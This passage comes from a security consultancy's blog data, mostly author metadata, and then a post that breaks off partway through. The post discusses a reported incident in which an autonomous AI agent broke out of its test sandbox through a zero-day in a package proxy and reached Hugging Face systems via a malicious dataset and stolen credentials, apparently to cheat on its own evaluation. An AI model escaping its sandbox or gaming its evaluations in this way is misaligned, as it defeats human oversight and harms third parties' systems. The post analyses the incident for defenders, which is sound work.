EN",{"type":982,"id":1016,"value":1017},"inbox_key","gkgab-contact-form",{"type":982,"id":1019},"_gotcha",{"type":982,"id":1021},"jsonData",[1023,1025,1027],{"lang":4,"href":1024},"/de/posts/2026-07-31-isg-switzerland-2026",{"lang":940,"href":1026},"/en/posts/2026-07-31-isg-switzerland-2026",{"lang":1028,"href":1029},"es","/es/posts/2026-07-31-isg-switzerland-2026",{"form":511},"/posts/2026-07-31-isg-switzerland-2026",{"title":802,"description":936},"posts/2026-07-31-isg-switzerland-2026",[1035,1036],"Award","ISG","Xa6SyPbPqqFfRadtQg3mE194tr5mhX6IkbUVxPpQwpI",{"id":1039,"extension":1040,"meta":1041,"stem":7,"__hash__":1382},"authors_data/authors.json","json",{"path":1042,"Alexander Schlindwein":1043,"Sophie Luna":1049,"Nadine Kern":1057,"Karsten Kleinschmidt":1064,"Julian Wendt":1070,"Holger Bunkradt":1075,"Ralf Mania":1081,"Oliver Kieselbach":1087,"Steffen Schwerdtfeger":1093,"Gunnar Winter":1101,"Jan Petersen":1106,"Thorsten Kunzi":1111,"Moritz Pohl":1115,"Thorben Pöschus":1120,"Christoph Hannebauer":1126,"Marco Scheel":1130,"Christopher Brumm":1135,"Florian Klante":1142,"Niklas Bachmann":1147,"Nils Krautkrämer":1152,"Patrick Treptau":1158,"Peter Beckendorf":1163,"Patrick Sobau":1168,"Jörg Wunderlich":1173,"Michael Breither":1177,"Christian Kanja":1182,"Zeba Hoffmann":1188,"Jochen Fröhlich":1193,"Jan Geisbauer":1197,"Gerrit Reinke":1207,"Christian Kordel":1213,"Stephan Wälde":1217,"Carolin Kanja":1222,"Adrian Ritter":1227,"Marvin Bangert":1232,"Thorsten Pickhan":1238,"Christian Lorenz":1244,"Denis Böhm":1249,"Fabian Bader":1254,"Juan Jose Fernandez Perez":1260,"Mahschid Sayyar":1265,"Benjamin Dassow":1270,"Markus Walschburger":1275,"Jonathan Haist":1280,"Daniel Rohregger":1285,"Thomas Naunheim":1290,"Florian Stöckl":1295,"Pascal Asch":1300,"Markus Kättner":1305,"Anna Ulbricht":1312,"Annette Brauns":1319,"body":1326,"title":1381,"Thorben Poeschus":1120,"Nils Krautkraemer":1152,"Joerg Wunderlich":1173,"Jochen Froehlich":1193,"Stephan Waelde":1217,"Denis Boehm":1249,"Florian Stoeckl":1295,"Markus Kaettner":1305},"/authors",{"display_name":1044,"avatar":1045,"permalink":1046,"twitter":1047,"linkedin":1048},"Alexander Schlindwein","people/people-alexander-rudolph.png","/authors/alexander-schlindwein","AlexanderOnIT","schlindwein-alexander",{"display_name":1050,"avatar":1051,"permalink":1052,"twitter":1053,"linkedin":1054,"imageOffsetLeft":1055,"imageOffsetTop":1056},"Sophie Luna","c_thumb,h_1600,w_1600/people/people-sophie-luna.jpg","/authors/sophie-luna","glueckkanjagab","../company/glueckkanja-gab","58%","67%",{"display_name":1058,"avatar":1059,"permalink":1060,"twitter":1061,"linkedin":1062,"imageOffsetTop":1063},"Nadine Kern","people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern","72%",{"display_name":1065,"avatar":1066,"permalink":1067,"twitter":1068,"linkedin":1069},"Karsten Kleinschmidt","people/people-karsten-kleinschmidt.png","/authors/karsten-kleinschmidt","KarstenonIT","karstenkleinschmidt",{"display_name":1071,"avatar":1072,"permalink":1073,"linkedin":1074},"Julian Wendt","people/people-julian-wendt.png","/authors/julian-wendt","julian-wendt",{"display_name":1076,"avatar":1077,"permalink":1078,"linkedin":1079,"twitter":1080},"Holger Bunkradt","people/people-holger-bunkradt.png","/authors/holger-bunkradt","holger-bunkradt-12b5053b","hbunkradt",{"display_name":1082,"avatar":1083,"permalink":1084,"linkedin":1085,"twitter":1086},"Ralf Mania","people/people-ralf-mania.png","/authors/ralf-mania","ralf-mania-146a2757","RaMa1976",{"display_name":1088,"avatar":1089,"permalink":1090,"linkedin":1091,"twitter":1092},"Oliver Kieselbach","people/people-oliver-kieselbach.png","/authors/oliver-kieselbach","oliver-kieselbach-a4a3409","okieselbT",{"display_name":1094,"avatar":1095,"permalink":1096,"linkedin":1097,"twitter":1098,"imageOffsetTop":1099,"imageOffsetLeft":1100},"Steffen Schwerdtfeger","people/people-steffen-schwerdtfeger.png","/authors/steffen-schwerdtfeger","steffen-schwerdtfeger","SteffenAtCloud","79%","51%",{"display_name":1102,"avatar":1103,"permalink":1104,"twitter":1053,"linkedin":1105},"Gunnar Winter","c_thumb,h_1600,w_1600/people/people-gunnar-winter.jpg","/authors/gunnar-winter","company/glueckkanja-gab",{"display_name":1107,"avatar":1108,"permalink":1109,"twitter":1053,"linkedin":1110},"Jan Petersen","c_thumb,h_1600,w_1600/people/jan-petersen.png","/authors/jan-petersen","jan-petersen-26a901",{"display_name":1112,"avatar":1113,"permalink":1114,"twitter":1053,"linkedin":1105,"imageOffsetTop":1063},"Thorsten Kunzi","c_thumb,h_1600,w_1600/people/author-thorsten-kunzi.png","/authors/thorsten-kunzi",{"display_name":1116,"avatar":1117,"permalink":1118,"twitter":1053,"linkedin":1119},"Dr. Moritz Pohl","c_thumb,h_1600,w_1600/people/people-moritz-pohl.png","/authors/moritz-pohl","dr-moritz-pohl",{"display_name":1121,"avatar":1122,"permalink":1123,"twitter":1124,"linkedin":1125},"Thorben Pöschus","c_thumb,h_1600,w_1600/people/thorben.poeschus.png","/authors/thorben-poeschus","TPO901","thorben-pöschus-624693b7",{"display_name":1127,"avatar":1128,"permalink":1129,"twitter":1053,"linkedin":1105,"imageOffsetTop":1063},"Dr. Christoph Hannebauer","people/people-christoph-hannebauer.png","/authors/christoph-hannebauer",{"display_name":1131,"avatar":1132,"permalink":1133,"twitter":1134,"linkedin":1134},"Marco Scheel","c_thumb,h_1600,w_1600/people/people-marco-scheel.png","/authors/marco-scheel","marcoscheel",{"display_name":1136,"avatar":1137,"permalink":1138,"twitter":1139,"linkedin":1140,"imageOffsetTop":1141},"Christopher Brumm","c_thumb,h_1600,w_1600/people/people-christopher-brumm.jpg","/authors/christopher-brumm","cbrhh","christopherbrumm","66%",{"display_name":1143,"avatar":1144,"permalink":1145,"linkedin":1146,"twitter":1053},"Florian Klante","c_thumb,h_1600,w_1600/people/florian-klante.jpg","/authors/florian-klante","florian-klante-6031b31b",{"display_name":1148,"avatar":1149,"permalink":1150,"linkedin":1151,"twitter":1053},"Niklas Bachmann","c_thumb,h_1600,w_1600/people/niklas.bachmann.png","/authors/niklas-bachmann","niklas-bachmann-66a863158",{"display_name":1153,"avatar":1154,"permalink":1155,"twitter":1156,"linkedin":1157},"Nils Krautkrämer","c_thumb,h_1600,w_1600/people/nils-krautkraemer.png","/authors/nils-krautkraemer","KrauNils","nils-krautkrämer-8b04bb250",{"display_name":1159,"avatar":1160,"permalink":1161,"linkedin":1162,"twitter":1053},"Patrick Treptau","c_thumb,h_1600,w_1600/people/people-patrick-treptau.png","/authors/patrick-traptau","ptreptau",{"display_name":1164,"avatar":1165,"permalink":1166,"linkedin":1167,"twitter":1053,"imageOffsetTop":1063},"Peter Beckendorf","c_thumb,h_1600,w_1600/people/peter-beckendorf.png","/authors/peter-beckendorf","peter-beckendorf-29a239b1",{"display_name":1169,"avatar":1170,"permalink":1171,"linkedin":1172,"twitter":1053},"Patrick Sobau","c_thumb,h_1600,w_1600/people/patrick-sobau.png","/authors/patrick-sobau","patrick-sobau",{"display_name":1174,"avatar":1175,"permalink":1176,"twitter":1053},"Jörg Wunderlich","c_thumb,h_1600,w_1600/people/joerg-wunderlich.png","/authors/joerg-wunderlich",{"display_name":1178,"avatar":1179,"permalink":1180,"twitter":1053,"linkedin":1181},"Michael Breither","c_thumb,h_1600,w_1600/people/people-michael-breither.jpg","/authors/michael-breither","michaelbreither",{"display_name":1183,"avatar":1184,"permalink":1185,"twitter":1186,"linkedin":1187},"Christian Kanja","c_thumb,h_1600,w_1600/people/people-christian-kanja.png","/authors/christian-kanja","cekageka","christian-kanja",{"display_name":1189,"avatar":1190,"permalink":1191,"linkedin":1192,"twitter":1053},"Zeba Hoffmann","c_thumb,h_1600,w_1600/people/zeba-hoffmann.png","/authors/zeba-hoffmann","zebahoffmann",{"display_name":1194,"avatar":1195,"permalink":1196,"twitter":1053,"linkedin":1105},"Jochen Fröhlich","c_thumb,h_1600,w_1600/people/people-jochen-froehlich.png","/authors/jochen-froehlich",{"display_name":961,"avatar":1198,"permalink":1199,"twitter":1200,"linkedin":1200,"imageOffsetTop":1063,"socials":1201},"c_thumb,h_1600,w_1600/people/people-jan-geisbauer-csoc.png","/authors/jan-geisbauer","JanGeisbauer",[1202,1204],{"text":731,"href":1203},"https://emptydc.com",{"text":1205,"href":1206},"Podcast","https://hairlessinthecloud.com",{"display_name":1208,"avatar":1209,"permalink":1210,"twitter":1211,"linkedin":1212},"Gerrit Reinke","c_thumb,h_1600,w_1600/people/gerrit-reinke.png","/authors/gerrit-reinke","GLWRe","glwr",{"display_name":1214,"avatar":1215,"permalink":1216,"twitter":1053,"linkedin":1105},"Christian Kordel","c_thumb,h_1600,w_1600/people/christian-kordel.png","/authors/christian-kordel",{"display_name":1218,"avatar":1219,"permalink":1220,"twitter":1221,"linkedin":1105},"Stephan Wälde","c_thumb,h_1600,w_1600/people/people-stephan-waelde.png","/authors/stephan-waelde","stephanwaelde",{"display_name":804,"avatar":1223,"permalink":1224,"twitter":1225,"linkedin":1226},"c_thumb,h_1600,w_1600/people/people-carolin-kanja.jpg","/authors/carolin-kanja","fraukanja","carolin-kanja",{"display_name":1228,"avatar":1229,"permalink":1230,"twitter":1231,"linkedin":1231},"Adrian Ritter","c_thumb,h_1600,w_1600/people/people-adrian-ritter.png","/authors/adrian-ritter","adrianritter",{"display_name":1233,"avatar":1234,"permalink":1235,"twitter":1236,"linkedin":1237},"Marvin Bangert","c_thumb,h_1600,w_1600/people/people-marvin-bangert.png","/authors/marvin-bangert","marvinbangert","marvin-bangert",{"display_name":1239,"avatar":1240,"permalink":1241,"twitter":1242,"linkedin":1243},"Thorsten Pickhan","c_thumb,h_1600,w_1600/people/people-thorsten-pickhan.png","/authors/thorsten-pickhan","tpickhan","thorsten-pickhan",{"display_name":1245,"avatar":1246,"permalink":1247,"linkedin":1248,"twitter":1053},"Christian Lorenz","c_thumb,h_1600,w_1600/people/people-christian-lorenz.png","/authors/christian-lorenz","christianlorenz95",{"display_name":1250,"avatar":1251,"permalink":1252,"linkedin":1253,"twitter":1053},"Denis Böhm","c_thumb,h_1600,w_1600/people/people-denis-boehm.png","/authors/denis-boehm","denis-böhm-3bb834135",{"display_name":1255,"avatar":1256,"permalink":1257,"linkedin":1258,"twitter":1259},"Fabian Bader","c_thumb,h_1600,w_1600/people/people-fabian-bader.jpg","/authors/fabian-bader","fabianbader","fabian_bader",{"display_name":1261,"avatar":1262,"permalink":1263,"linkedin":1264},"Juan Jose Fernandez Perez","c_thumb,h_1600,w_1600/people/people-juan-jose-fernandez.jpg","/authors/juan-jose-fernandez-perez","juan-jose-fernandez-perez-8016055",{"display_name":1266,"avatar":1267,"permalink":1268,"linkedin":1269},"Mahschid Sayyar","c_thumb,h_1600,w_1600/people/people-mahschid-sayyar.jpg","/authors/mahschid-sayyar","mahschid-sayyar-97544463",{"display_name":1271,"avatar":1272,"permalink":1273,"linkedin":1274},"Benjamin Dassow","c_thumb,h_1600,w_1600/people/people-benjamin-dassow.jpg","/authors/benjamin-dassow","benjamin-dassow",{"display_name":1276,"avatar":1277,"permalink":1278,"linkedin":1279},"Markus Walschburger","c_thumb,h_1600,w_1600/people/people-markus-walschburger.jpg","/authors/markus-walschburger","markus-walschburger",{"display_name":1281,"avatar":1282,"permalink":1283,"linkedin":1284,"imageOffsetTop":1063},"Jonathan Haist","c_thumb,h_1600,w_1600/people/people-jonathan-haist.jpg","/authors/jonathan-haist","jonathanhaist",{"display_name":1286,"avatar":1287,"permalink":1288,"linkedin":1289,"imageOffsetTop":1063},"Daniel Rohregger","c_thumb,h_1600,w_1600/people/people-daniel-rohregger.jpg","/authors/daniel-rohregger","drohregger",{"display_name":1291,"avatar":1292,"permalink":1293,"linkedin":1294,"imageOffsetTop":1141},"Thomas Naunheim","c_thumb,h_1600,w_1600/people/people-thomas-naunheim.jpg","/authors/thomas-naunheim","thomasnaunheim",{"display_name":1296,"avatar":1297,"permalink":1298,"linkedin":1299,"imageOffsetTop":1141},"Florian Stöckl","c_thumb,h_1600,w_1600/people/people-florian-stoeckl.jpg","/authors/florian-stoeckl","florianstoeckl",{"display_name":1301,"avatar":1302,"permalink":1303,"linkedin":1304,"imageOffsetTop":1141},"Pascal Asch","c_thumb,h_1600,w_1600/people/Pascal.Asch.648.jpg","/authors/pascal-asch","pascal-asch",{"display_name":1306,"avatar":1307,"permalink":1308,"linkedin":1309,"imageOffsetTop":1310,"imageOffsetLeft":1311},"Markus Kättner","c_thumb,h_1600,w_1600/people/markus-kaettner.jpg","/authors/markus-kaettner","markus-kättner-b600119","62%","63%",{"display_name":1313,"avatar":1314,"permalink":1315,"linkedin":1316,"imageOffsetTop":1317,"imageOffsetLeft":1318},"Anna Ulbricht","c_thumb,h_1600,w_1600/people/anna-katharina.ulbricht-09.png","/authors/anna-ulbricht","anna-katharina-u-a67702199","70%","50%",{"display_name":1320,"avatar":1321,"permalink":1322,"linkedin":1323,"imageOffsetTop":1324,"imageOffsetLeft":1325},"Annette Brauns","c_thumb,h_2000,w_1200/people/Annette-Brauns-8.jpg","/authors/annette-brauns","annette-brauns","95%","60%",{"Alexander Schlindwein":1327,"Sophie Luna":1328,"Nadine Kern":1329,"Karsten Kleinschmidt":1330,"Julian Wendt":1331,"Holger Bunkradt":1332,"Ralf Mania":1333,"Oliver Kieselbach":1334,"Steffen Schwerdtfeger":1335,"Gunnar Winter":1336,"Jan Petersen":1337,"Thorsten Kunzi":1338,"Moritz Pohl":1339,"Thorben Pöschus":1340,"Christoph Hannebauer":1341,"Marco Scheel":1342,"Christopher Brumm":1343,"Florian Klante":1344,"Niklas Bachmann":1345,"Nils Krautkrämer":1346,"Patrick Treptau":1347,"Peter Beckendorf":1348,"Patrick Sobau":1349,"Jörg Wunderlich":1350,"Michael Breither":1351,"Christian Kanja":1352,"Zeba Hoffmann":1353,"Jochen Fröhlich":1354,"Jan Geisbauer":1355,"Gerrit Reinke":1359,"Christian Kordel":1360,"Stephan Wälde":1361,"Carolin Kanja":1362,"Adrian Ritter":1363,"Marvin Bangert":1364,"Thorsten Pickhan":1365,"Christian Lorenz":1366,"Denis Böhm":1367,"Fabian Bader":1368,"Juan Jose Fernandez Perez":1369,"Mahschid Sayyar":1370,"Benjamin Dassow":1371,"Markus Walschburger":1372,"Jonathan Haist":1373,"Daniel Rohregger":1374,"Thomas Naunheim":1375,"Florian Stöckl":1376,"Pascal Asch":1377,"Markus Kättner":1378,"Anna Ulbricht":1379,"Annette Brauns":1380},{"display_name":1044,"avatar":1045,"permalink":1046,"twitter":1047,"linkedin":1048},{"display_name":1050,"avatar":1051,"permalink":1052,"twitter":1053,"linkedin":1054,"imageOffsetLeft":1055,"imageOffsetTop":1056},{"display_name":1058,"avatar":1059,"permalink":1060,"twitter":1061,"linkedin":1062,"imageOffsetTop":1063},{"display_name":1065,"avatar":1066,"permalink":1067,"twitter":1068,"linkedin":1069},{"display_name":1071,"avatar":1072,"permalink":1073,"linkedin":1074},{"display_name":1076,"avatar":1077,"permalink":1078,"linkedin":1079,"twitter":1080},{"display_name":1082,"avatar":1083,"permalink":1084,"linkedin":1085,"twitter":1086},{"display_name":1088,"avatar":1089,"permalink":1090,"linkedin":1091,"twitter":1092},{"display_name":1094,"avatar":1095,"permalink":1096,"linkedin":1097,"twitter":1098,"imageOffsetTop":1099,"imageOffsetLeft":1100},{"display_name":1102,"avatar":1103,"permalink":1104,"twitter":1053,"linkedin":1105},{"display_name":1107,"avatar":1108,"permalink":1109,"twitter":1053,"linkedin":1110},{"display_name":1112,"avatar":1113,"permalink":1114,"twitter":1053,"linkedin":1105,"imageOffsetTop":1063},{"display_name":1116,"avatar":1117,"permalink":1118,"twitter":1053,"linkedin":1119},{"display_name":1121,"avatar":1122,"permalink":1123,"twitter":1124,"linkedin":1125},{"display_name":1127,"avatar":1128,"permalink":1129,"twitter":1053,"linkedin":1105,"imageOffsetTop":1063},{"display_name":1131,"avatar":1132,"permalink":1133,"twitter":1134,"linkedin":1134},{"display_name":1136,"avatar":1137,"permalink":1138,"twitter":1139,"linkedin":1140,"imageOffsetTop":1141},{"display_name":1143,"avatar":1144,"permalink":1145,"linkedin":1146,"twitter":1053},{"display_name":1148,"avatar":1149,"permalink":1150,"linkedin":1151,"twitter":1053},{"display_name":1153,"avatar":1154,"permalink":1155,"twitter":1156,"linkedin":1157},{"display_name":1159,"avatar":1160,"permalink":1161,"linkedin":1162,"twitter":1053},{"display_name":1164,"avatar":1165,"permalink":1166,"linkedin":1167,"twitter":1053,"imageOffsetTop":1063},{"display_name":1169,"avatar":1170,"permalink":1171,"linkedin":1172,"twitter":1053},{"display_name":1174,"avatar":1175,"permalink":1176,"twitter":1053},{"display_name":1178,"avatar":1179,"permalink":1180,"twitter":1053,"linkedin":1181},{"display_name":1183,"avatar":1184,"permalink":1185,"twitter":1186,"linkedin":1187},{"display_name":1189,"avatar":1190,"permalink":1191,"linkedin":1192,"twitter":1053},{"display_name":1194,"avatar":1195,"permalink":1196,"twitter":1053,"linkedin":1105},{"display_name":961,"avatar":1198,"permalink":1199,"twitter":1200,"linkedin":1200,"imageOffsetTop":1063,"socials":1356},[1357,1358],{"text":731,"href":1203},{"text":1205,"href":1206},{"display_name":1208,"avatar":1209,"permalink":1210,"twitter":1211,"linkedin":1212},{"display_name":1214,"avatar":1215,"permalink":1216,"twitter":1053,"linkedin":1105},{"display_name":1218,"avatar":1219,"permalink":1220,"twitter":1221,"linkedin":1105},{"display_name":804,"avatar":1223,"permalink":1224,"twitter":1225,"linkedin":1226},{"display_name":1228,"avatar":1229,"permalink":1230,"twitter":1231,"linkedin":1231},{"display_name":1233,"avatar":1234,"permalink":1235,"twitter":1236,"linkedin":1237},{"display_name":1239,"avatar":1240,"permalink":1241,"twitter":1242,"linkedin":1243},{"display_name":1245,"avatar":1246,"permalink":1247,"linkedin":1248,"twitter":1053},{"display_name":1250,"avatar":1251,"permalink":1252,"linkedin":1253,"twitter":1053},{"display_name":1255,"avatar":1256,"permalink":1257,"linkedin":1258,"twitter":1259},{"display_name":1261,"avatar":1262,"permalink":1263,"linkedin":1264},{"display_name":1266,"avatar":1267,"permalink":1268,"linkedin":1269},{"display_name":1271,"avatar":1272,"permalink":1273,"linkedin":1274},{"display_name":1276,"avatar":1277,"permalink":1278,"linkedin":1279},{"display_name":1281,"avatar":1282,"permalink":1283,"linkedin":1284,"imageOffsetTop":1063},{"display_name":1286,"avatar":1287,"permalink":1288,"linkedin":1289,"imageOffsetTop":1063},{"display_name":1291,"avatar":1292,"permalink":1293,"linkedin":1294,"imageOffsetTop":1141},{"display_name":1296,"avatar":1297,"permalink":1298,"linkedin":1299,"imageOffsetTop":1141},{"display_name":1301,"avatar":1302,"permalink":1303,"linkedin":1304,"imageOffsetTop":1141},{"display_name":1306,"avatar":1307,"permalink":1308,"linkedin":1309,"imageOffsetTop":1310,"imageOffsetLeft":1311},{"display_name":1313,"avatar":1314,"permalink":1315,"linkedin":1316,"imageOffsetTop":1317,"imageOffsetLeft":1318},{"display_name":1320,"avatar":1321,"permalink":1322,"linkedin":1323,"imageOffsetTop":1324,"imageOffsetLeft":1325},"Authors","v4BFjFTsIGK6QfYDKS1bZ8NqfUrV_WCoMMRwyN5uv8c",[1384,1490,1796,1931,2066,2229,2345,2446,4651,4880,5188,5251,5943,6764,6888,7024,7197,7349,7611,8373,8520],{"id":801,"title":802,"author":1385,"body":1386,"cta":767,"description":936,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":1460,"moment":943,"navigation":511,"path":1031,"seo":1488,"stem":1033,"tags":1489,"webcast":752,"__hash__":1037},[804],{"type":806,"value":1387,"toc":1453},[1388,1392,1394,1396,1398,1400,1402,1406,1408,1412,1416,1418,1420,1424,1426,1430,1438,1451],[809,1389,811,1390,817],{},[813,1391,816],{"href":815},[819,1393,822],{"id":821},[809,1395,825],{},[809,1397,828],{},[819,1399,832],{"id":831},[809,1401,825],{},[809,1403,1404],{},[838,1405],{"alt":840,"src":841},[809,1407,844],{},[809,1409,1410,851],{},[848,1411,850],{},[809,1413,854,1414,857],{},[813,1415,396],{"href":399},[819,1417,861],{"id":860},[809,1419,825],{},[809,1421,1422],{},[838,1423],{"alt":868,"src":869},[809,1425,872],{},[809,1427,1428,851],{},[848,1429,877],{},[809,1431,880,1432,883,1434,886,1436,890],{},[813,1433,45],{"href":48},[813,1435,55],{"href":58},[813,1437,889],{"href":428},[892,1439,895,1440,895,1443,895,1445],{"style":894},[897,1441,903],{"className":1442,"style":901,"id":902},[900],[809,1444,907],{"style":906},[813,1446,1448],{"role":910,"className":1447,"dataText":916,"href":665,"type":917},[912,913,914,915],[919,1449,916],{"className":1450},[922],[809,1452,925],{},{"title":927,"searchDepth":928,"depth":928,"links":1454},[1455,1456,1457],{"id":821,"depth":928,"text":822},{"id":831,"depth":928,"text":832},{"id":860,"depth":928,"text":861,"children":1458},[1459],{"id":902,"depth":935,"text":903},{"lang":940,"seoTitle":941,"titleClass":942,"date":943,"categories":1461,"blogtitlepic":946,"socialimg":947,"customExcerpt":948,"keywords":949,"contactInContent":1462,"hreflang":1483,"published":511,"scripts":1487},[945],{"quote":511,"infos":1463},{"bgColor":952,"color":953,"boxBgColor":764,"boxColor":953,"headline":954,"subline":955,"level":819,"textStyling":956,"flush":957,"person":1464,"form":1468},{"image":959,"cloudinary":511,"alt":960,"name":961,"quotee":961,"quoteeTitle":962,"quote":963,"detailsHeader":964,"details":1465},[1466,1467],{"text":967,"href":968,"details":969,"icon":970},{"text":972,"href":973,"icon":974},{"ctaText":976,"cta":1469,"method":938,"action":979,"fields":1470},{"skin":978},[1471,1472,1473,1474,1475,1476,1477,1478,1479,1480,1481,1482],{"type":982,"id":983,"value":984},{"label":986,"type":987,"id":988,"required":511,"requiredMsg":989},{"label":991,"type":987,"id":615,"required":511,"requiredMsg":992},{"label":994,"type":995,"id":995,"required":511,"requiredMsg":996},{"label":998,"type":999,"id":1000,"required":752,"requiredMsg":1001},{"label":1003,"type":1004,"id":1005,"required":511,"requiredMsg":1006},{"type":982,"id":1008,"value":945},{"type":982,"id":1010,"value":1011},{"type":982,"id":1013,"value":1014},{"type":982,"id":1016,"value":1017},{"type":982,"id":1019},{"type":982,"id":1021},[1484,1485,1486],{"lang":4,"href":1024},{"lang":940,"href":1026},{"lang":1028,"href":1029},{"form":511},{"title":802,"description":936},[1035,1036],{"id":1491,"title":1492,"author":1493,"body":1494,"cta":767,"description":927,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":1753,"moment":1755,"navigation":511,"path":1788,"seo":1789,"stem":1790,"tags":1791,"webcast":752,"__hash__":1795},"content_en/posts/2026-07-24-outbreak-openai-hugging-face.md","Outbreak. What the OpenAI/Hugging Face incident reveals and what it doesn't",[961],{"type":806,"value":1495,"toc":1743},[1496,1500,1502,1512,1521,1524,1527,1531,1533,1536,1539,1542,1546,1548,1557,1560,1564,1566,1574,1577,1581,1583,1586,1589,1592,1601,1605,1607,1616,1623,1629,1633,1635,1638,1641,1645,1647],[819,1497,1499],{"id":1498},"what-happened","What happened",[809,1501,825],{},[809,1503,1504,1505,1511],{},"A few days ago, OpenAI and Hugging Face ",[813,1506,1510],{"href":1507,"rel":1508},"https://www.cnbc.com/2026/07/22/open-ai-cyber-models-hack-hugging-face.html",[1509],"nofollow","disclosed an incident"," that has electrified the security community: An autonomous AI agent, powered by GPT-5.6 Sol and an unreleased, more capable model, broke out of its isolated test environment during an internal security test. Step by step, the agent gained more access within OpenAI's systems, exploited a previously unknown zero-day vulnerability along the way, reached the internet, and finally broke into internal Hugging Face systems to obtain information it had originally been tasked to find.",[809,1513,1514,1515,1520],{},"The first technical details are now public, among them ",[813,1516,1519],{"href":1517,"rel":1518},"https://simonwillison.net/2026/Jul/22/openai-cyberattack/",[1509],"Simon Willison's write-up of the case",": The test ran as part of an exploit benchmark, deliberately with reduced safety mechanisms. The test environment had exactly one connection to the outside world: an internal package proxy for installing dependencies. And it was precisely in this proxy that the model found the zero-day. The escape was less magic than prying open the only door there was. At Hugging Face, the path then led through a malicious dataset into the processing infrastructure, and from there via stolen credentials into several internal clusters.",[809,1522,1523],{},"The motive is almost the best punchline of the whole story: The model was looking for information that would let it cheat on its own evaluation. The presumed first fully autonomous AI attack was, strictly speaking, a case of academic cheating. With collateral damage.",[809,1525,1526],{},"Hugging Face describes the incident as different from anything they have handled before: \"driven, end to end, by an autonomous AI agent system\". OpenAI speaks of an unprecedented cyber incident. We have no intention of downplaying the significance of this attack. But we do want to take the heat and emotion out of the debate, because right now that is the biggest risk to good decisions.",[819,1528,1530],{"id":1529},"why-this-incident-feels-so-threatening","Why this incident feels so threatening",[809,1532,825],{},[809,1534,1535],{},"A look at psychology helps. Risk researcher Paul Slovic has shown that we do not assess risks by their statistical danger, but primarily along two dimensions: How familiar is a risk to us, and how much do we dread it? Driving a car is objectively dangerous but feels harmless because it seems familiar and controllable. An AI model that has escaped from the lab, on the other hand, taps directly into the unknown and uncontrollable, landing squarely in the category Slovic calls \"dread risk\".",[809,1537,1538],{},"Daniel Kahneman described in \"Thinking, Fast and Slow\" what happens next: With unfamiliar, threatening-looking risks, our fast, intuitive, emotional thinking system takes over, not the slow, analytical one. That is exactly the pattern we are currently observing in many comment sections: The incident is not being analyzed, it is being felt.",[809,1540,1541],{},"So: take a deep breath, switch on System 2, and look at the case from a few more angles.",[819,1543,1545],{"id":1544},"perspective-1-show-the-evidence-florian-roth","Perspective 1: Show the evidence (Florian Roth)",[809,1547,825],{},[809,1549,1550,1551,1556],{},"Security researcher Florian Roth (known for Sigma and THOR, among others) takes issue with one central point in his ",[813,1552,1555],{"href":1553,"rel":1554},"https://www.linkedin.com/posts/floroth_one-thing-about-this-openai-hugging-face-share-7485702026429960192-npkt/",[1509],"LinkedIn post",": the missing documentation. Hugging Face claims the attack was driven \"end to end\" by an autonomous agent system. But the victim's telemetry can, by definition, only show what happened in its own environment. It cannot show whether humans upstream adjusted prompts, restarted runs, selected successful paths, or manually intervened at decisive moments. Roth's demand is as simple as it is justified: If OpenAI has the traces (prompts, tool calls, failed runs, human interventions), they should publish them. Until then, \"fully autonomous\" is a claim, not a forensic finding. One commenter aptly adds: Even then, it would be nearly impossible to prove beyond doubt how much human interaction actually took place.",[809,1558,1559],{},"And Roth adds one more barb on top. The narrative of the two AI companies boils down to three lines: AI attacked us. AI saved us. So now everyone needs more AI. What would have been an embarrassment ten years ago (weak isolation, overly broad privileges, insufficient segmentation, a huge blast radius) is packaged today as a capability demo and a heroic AI-vs-AI story. His dry verdict: Rate limits, egress restrictions, isolated workers, and cleanly scoped credentials would have slowed down large parts of this activity and made it visible early. Nobody needs an LLM for that.",[819,1561,1563],{"id":1562},"perspective-2-we-survived-worse-marcus-hutchins","Perspective 2: We survived worse (Marcus Hutchins)",[809,1565,825],{},[809,1567,1568,1569,1573],{},"Marcus Hutchins, the security researcher who stopped the WannaCry outbreak with a kill switch in 2017, puts the incident into historical perspective in his ",[813,1570,938],{"href":1571,"rel":1572},"https://www.linkedin.com/posts/malwaretech_anytime-someone-is-freaking-out-about-fully-share-7485851514784272384-0-oa/",[1509],". Anyone panicking about \"fully autonomous cyberattacks\" should remember the golden era of computer worms: ILOVEYOU, Code Red, SQL Slammer. Self-replicating malware that infected millions of systems in a single day without any human involvement, at a time when many systems sat unprotected directly on the internet.",[809,1575,1576],{},"His argument: Agentic attacks are fundamentally limited by speed and cost. In the time it takes an AI model to generate a single response, a classic worm would already have infected tens of thousands of systems, and the token costs of autonomously hacking millions of systems would blow most attackers' budgets. On top of that: Firewalls, EDR, network segmentation, sandboxing, MFA, and many other controls are standard today and form real hurdles that simply did not exist back then. His conclusion: AI-powered attacks cannot set cybersecurity back by decades. They cannot un-invent established security controls and basic hygiene. Attack surface reduction works. A zero-day cannot hit a system it cannot reach.",[819,1578,1580],{"id":1579},"what-both-are-saying-and-what-follows","What both are saying and what follows",[809,1582,825],{},[809,1584,1585],{},"Both experts arrive at the same conclusion by different routes: focus on what matters. Organizations that continuously improve their security posture and consistently implement concepts like Zero Trust, least privilege, and clean tier separation are significantly less likely to become victims, regardless of whether there is a human, a script, or a language model on the other end.",[809,1587,1588],{},"The incident still needs to be taken seriously, no matter how the evidence question plays out. This incident is not an example of AI taking over the internet. But it shows what a targeted attack at a new level looks like: the autonomous linking of two separate attack chains across two foreign infrastructures, executed in many thousands of individual actions from a swarm of short-lived sandboxes. Should OpenAI publish the traces and prove full autonomy, the picture does not become any less serious. It changes nothing about the logic of defense, though. It confirms it.",[809,1590,1591],{},"That attackers find paths nobody thought of in advance is not a new insight but the daily bread of everyone working in security. That is exactly why defense in depth exists: If I do not detect or stop the attacker at stage 4 of the attack chain, then at stage 5. That explicitly includes zero-days. You can build infrastructures that withstand even wild storms. Not because you foresee every storm, but because you build for storms.",[809,1593,1594,1595,1600],{},"A side note of irony that almost drowns in the noise: For the forensic analysis, Hugging Face relied, of all things, on an open Chinese model, partly because a hosted US frontier model ",[813,1596,1599],{"href":1597,"rel":1598},"https://huggingface.co/datasets/huggingface/forensic-refusal/blob/main/glm5.2.jsonl",[1509],"flatly refused to analyze a backdoor",". The debate about which tools defenders may use in an emergency, and how quickly, has only just begun, and it is at least as important as the question of what attackers will be capable of.",[819,1602,1604],{"id":1603},"no-autonomous-soc-but-a-better-one","No autonomous SOC, but a better 